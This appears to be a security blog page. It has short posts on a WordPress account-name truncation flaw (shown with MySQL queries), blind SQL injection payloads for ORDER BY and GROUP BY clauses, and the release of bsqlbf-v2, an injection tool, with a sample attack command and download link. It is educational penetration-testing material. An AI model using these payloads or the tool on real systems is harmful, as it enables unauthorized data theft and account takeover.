NotSoSecure became slighlty more secure with the new Wordpress update.
This update is highly recommended if your wordpress allows user registration.
Its amazing how many vulnerabilities have been identified in wordpress over the years and i wonder how many are yet to come.
I wonder how many web sites will get effected because of this issue. Stefan Esser has a great write up here and the wordpress exploit here.
the following may help you understand this issue better:-
mysql> create table users (username varchar(10), password varchar(20));
Query OK, 0 rows affected (0.12 sec)
mysql> insert into users values('admin','Passw0rd');
Query OK, 1 row affected (0.02 sec)
mysql> select * from users where username ='admin';
+———-+———-+
| username | password |
+———-+———-+
| admin | Passw0rd |
+———-+———-+
1 row in set (0.01 sec)
mysql> insert into users values('admin a','Passw0rd');
Query OK, 1 row affected, 1 warning (0.00 sec)
mysql> select * from users where username ='admin';
+————+———-+
| username | password |
+————+———-+
| admin | Passw0rd |
| admin | Passw0rd |
+————+———-+
2 rows in set (0.00 sec)
Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+——+
| id |
+——+
| 1 |
+——+
1 row in set (0.00 sec)
—-
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
—–
For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples: mysql> select id from news where id =1 group by id union select 2222;
+——+
| id |
+——+
| 1 |
| 2222 |
+——+
2 rows in set (0.00 sec)
Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g
One solution to this problem could be:-
Thanks Ferruh for the help
Bsqlbf was originally written by A. Ramos from www.514.es and was intended to exploit blind sql injection against mysql backend database. This is a modified version of the same tool. It supports blind sql injection against the following databases:-
MS-SQL
MY-SQL
PostgreSQL
Oracle
It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.
It supports 2 modes of attack(-type):
Type 0: Blind SQL Injection based on True And Flase response
Type 1: Blind SQL Injection based on True And Error Response(details)
Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip
Send Your feedbacks/suggestions to sid-at-notsosecure(dot)com
